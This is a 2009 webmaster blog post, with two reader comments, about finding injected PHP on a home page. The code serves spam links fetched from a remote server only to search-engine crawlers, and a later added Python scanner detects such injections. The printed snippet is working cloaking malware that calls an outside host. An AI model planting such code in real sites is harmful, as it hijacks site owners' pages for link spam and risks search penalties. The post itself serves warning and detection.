Web Site Hack Alert

By Stephen Spry: Filed under SBSN News

I just “discovered” someone had embedded some PHP code on the home page of one of my web sites which redirected search engine robots to a page full of “links”.

I’m not quite sure “how” it got inserted onto the bottom of this home page, but its intent is fairly obvious.

This little piece of php scripting:

$HTTP_USER_AGENT=$_SERVER["HTTP_USER_AGENT"];
// Only act when the visitor's user agent names a search engine crawler
if (strstr($HTTP_USER_AGENT,"Googlebot") or
    strstr($HTTP_USER_AGENT,"msnbot") or
    strstr($HTTP_USER_AGENT,"Slurp") or
    strstr($HTTP_USER_AGENT,"Yahoo") or
    strstr($HTTP_USER_AGENT,"ZyBorg") or
    strstr($HTTP_USER_AGENT,"Jeeves")){
    // Fetch the remote page and print its contents into this page
    $strget=file_get_contents("http://srv1.searchingwww.net/allrandom.php");
    echo $strget;
}

is designed to “grab” search engine robots and redirect them to the URL at http://srv1.searchingwww.net/allrandom.php

So what happens when they get there?

Well, if you were to look yourself, you’d see nothing unless you looked at the actual HTML coding. Only then would you see a whole list of randomly generated URLs which point to keyword spam sites organised by these filthy people.

URLs to sites that capitalise on Adsense clicks and other affiliate programs that these slime are members of!

These URLs are hidden in a 1×1 pixel marquee which looks like this (I’ve actually substituted my OWN URLs here to get some linking benefit from it, and made it bigger so you can see!)

small business | australian domain names | internet marketing | aussie web directory | positions vacant


The main purpose of such an exploit seems to be to:
  • get search engines to go to these dubious links from your page, and
  • possibly transfer some of your page rank to these spam sites.

Fortunately, this hack had no effect on my site - because my page wasn’t in PHP, the robots would not have been able to follow the link in the script…

But…

There are several reasons why you should be worried about such an exploit!

  1. someone has hacked into your home page in the first place. It wasn’t something you would even notice unless you actually examined your HTML code.

  2. your site might be penalised or even banned by search engines for associating with “bad neighbourhoods” - i.e. pointing to these keyword spam sites.

  3. a variation of this type of script could have resulted in your site being the source of an uninvited spyware download into your visitor’s computer.

So now there’s something else you have to look out for!

Regards
Stephen Spry
SBSN Webmaster
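
One way to look for this kind of injection across a web root, as an added example (not code from the original post): it flags files that combine a crawler user-agent check with a remote fetch, and PHP code sitting in a non-PHP file such as index.html. The function names, the file extensions scanned and the example.invalid URL are assumptions made for illustration, and the sample pages are constructed.

```python
import os
import re

# Crawler names tested by the injected snippet quoted in this post.
CRAWLER_NAMES = ("Googlebot", "msnbot", "Slurp", "Yahoo", "ZyBorg", "Jeeves")
# Blog editors turn straight quotes into curly ones; normalise before matching.
QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'"})
REMOTE_FETCH = re.compile(
    r"(?:file_get_contents|fopen|include|require|curl_init)\s*\(?\s*[\"']https?://",
    re.IGNORECASE)
PHP_MARKERS = re.compile(r"<\?php|\$_SERVER\s*\[", re.IGNORECASE)
WEB_EXTENSIONS = (".php", ".html", ".htm", ".inc")  # assumed set of files to scan

def scan_source(name, text):
    """Return the findings for one file's contents (empty list if clean)."""
    text = text.translate(QUOTES)
    findings = []
    crawlers = [c for c in CRAWLER_NAMES if c.lower() in text.lower()]
    # A crawler name alone is harmless; it only matters next to a user-agent read.
    if "HTTP_USER_AGENT" in text and crawlers:
        findings.append("crawler user-agent check: " + ", ".join(crawlers))
    if REMOTE_FETCH.search(text):
        findings.append("remote content fetched over HTTP")
    if not name.lower().endswith((".php", ".inc")) and PHP_MARKERS.search(text):
        findings.append("PHP code in a non-PHP file")
    return findings

def scan_tree(root):
    """Walk a web root and map each suspicious file path to its findings."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(WEB_EXTENSIONS):
                path = os.path.join(folder, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fname, fh.read())
                if found:
                    report[path] = found
    return report

# Constructed samples: a static page with the snippet appended, and a clean page.
INFECTED = ('<html><body>Welcome</body></html>\n'
            '$HTTP_USER_AGENT=$_SERVER["HTTP_USER_AGENT"];\n'
            'if (strstr($HTTP_USER_AGENT,\u201cGooglebot\u201d) or\n'
            'strstr($HTTP_USER_AGENT,\u201cSlurp\u201d)){\n'
            '$strget=file_get_contents(\u201dhttp://example.invalid/allrandom.php\u201d);\n'
            'echo $strget;\n}')
CLEAN = "<html><body>We are listed on Yahoo and Google.</body></html>"
```

Run `scan_tree` against a copy of the web root; a match is a prompt to inspect the file by hand, not proof of compromise.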

Comments

2 Responses to “Web Site Hack Alert”

  1. Small Business Website Design on June 28th, 2009 7:48 pm

    Stephen, an interesting if not slightly worrying article. Where did they put it (head, body)? I build most of my sites with PHP so it’s something I need to keep an eye on.

  2. Stephen Spry on June 28th, 2009 10:26 pm

    To be honest, I really can’t remember the specifics… other than it was at the bottom of my index.html page on one of my sites… maybe they were hoping it was set to parse PHP so it would work for them… thankfully it wasn’t. But these people do try to hack the more “obvious” files like index.php or header.php/footer.php, or even this more brazen effort when they actually added a couple of posts to a different site of mine…

    It just shows when you have a lot of virtual real estate, that you’ve got to keep an eye on what’s happening there…
